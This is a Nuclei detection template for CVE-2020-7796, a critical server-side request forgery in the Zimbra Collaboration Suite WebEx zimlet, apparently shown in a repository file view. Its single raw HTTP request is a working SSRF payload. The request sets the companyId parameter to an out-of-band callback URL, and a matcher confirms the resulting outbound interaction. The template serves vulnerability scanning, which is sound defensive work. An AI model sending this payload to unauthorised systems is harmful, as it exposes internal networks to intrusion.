nuclei-templates/http/cves/2020/CVE-2020-7796.yaml

37 lines
1.1 KiB
YAML
Raw Normal View History

id: CVE-2020-7796
info:
name: Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery
author: gy741
severity: critical
description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled.
reference:
- https://www.adminxe.com/2183.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-7796
- https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-7796
cwe-id: CWE-918
2023-08-31 11:46:18 +00:00
epss-score: 0.72496
cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.97646
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: synacor
product: zimbra_collaboration_suite
tags: cve,cve2020,zimbra,ssrf,oast
http:
- raw:
- |
GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"